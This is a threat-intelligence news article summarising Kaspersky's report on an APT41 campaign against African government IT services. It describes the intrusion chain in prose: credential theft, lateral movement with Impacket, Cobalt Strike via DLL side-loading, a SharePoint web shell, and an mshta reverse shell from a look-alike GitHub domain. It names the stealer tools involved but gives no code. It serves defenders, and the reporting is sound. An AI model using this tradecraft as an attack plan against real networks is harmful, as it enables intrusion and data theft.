A China-linked cyber-espionage group known as APT41 has been connected to a new campaign targeting government IT services across Africa.
According to Kaspersky researchers Denis Kulik and Daniil Pogorelov, the attackers embedded hardcoded names of internal services, IP addresses, and proxy servers within their malware. Notably, one of the command-and-control (C2) servers was actually a compromised SharePoint server inside the victim’s infrastructure.
APT41 is a well-known Chinese state-sponsored threat group that has targeted a wide range of sectors globally, including telecommunications, energy, education, and healthcare, across more than 30 countries. What sets this campaign apart is its focus on Africa, a region previously seen as less affected by this group. However, this aligns with Trend Micro’s past reports that APT41 began increasing activity on the continent in late 2022.
Kaspersky launched an investigation after detecting suspicious activity on several workstations belonging to an undisclosed organization's IT environment. The attackers were seen running commands to check the availability of their C2 servers either directly or through internal proxies.
The root of the suspicious behavior was an overlooked host that had been breached. On this host, Impacket was run using a service account, and after modules like Atexec and WmiExec were executed, the attackers paused their activity. They soon resumed by stealing credentials for privileged accounts, allowing them to escalate privileges and move laterally within the network. Eventually, they deployed Cobalt Strike using DLL side-loading for C2 operations. These DLLs checked for the presence of certain language packs like Japanese, Korean, Simplified Chinese, and Traditional Chinese, and only ran if those were absent.
The group also used a hacked SharePoint server for sending commands through a C#-based malware planted on victim systems. Files named agents.exe and agentx.exe were delivered via SMB protocol. These files, actually C# trojans, executed instructions from a web shell called CommandHandler.aspx hosted on the SharePoint server. This approach combined traditional malware techniques with living-off-the-land tactics, making detection difficult. These tactics match MITRE ATT&CK techniques like T1071.001 (Web Protocols) and T1047 (WMI).
Following reconnaissance, the attackers prioritized machines they found valuable, downloading a malicious HTML Application (HTA) file embedded with JavaScript using mshta.exe. The payload came from a domain mimicking GitHub (github.githubassets[.]net) and was designed to create a reverse shell, enabling remote command execution. In addition, they used various tools to gather and exfiltrate data via the SharePoint server.
Some tools employed in the attacks include:
- A modified version of Pillager, used to extract browser credentials, SSH/FTP sessions, source code, screenshots, emails, chat logs, installed applications, and system information.
- Checkout, used to harvest credit card details and download history from browsers like Chrome, Opera, Brave, and Cốc Cốc.
- RawCopy, to extract raw registry data.
- Mimikatz, for dumping account credentials.
Kaspersky emphasized that APT41 uses both custom and publicly available tools including red-team utilities like Cobalt Strike to achieve their objectives. They quickly adapt to the target's environment and can even repurpose internal infrastructure for command and control or data theft.
This campaign blurs the line between ethical red teaming and real-world attacks, using tools like Impacket, Mimikatz, and Cobalt Strike alongside bespoke implants. These overlaps make it challenging for defenders to identify lateral movement, credential theft, and evasion tactics, especially in Windows-based systems.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
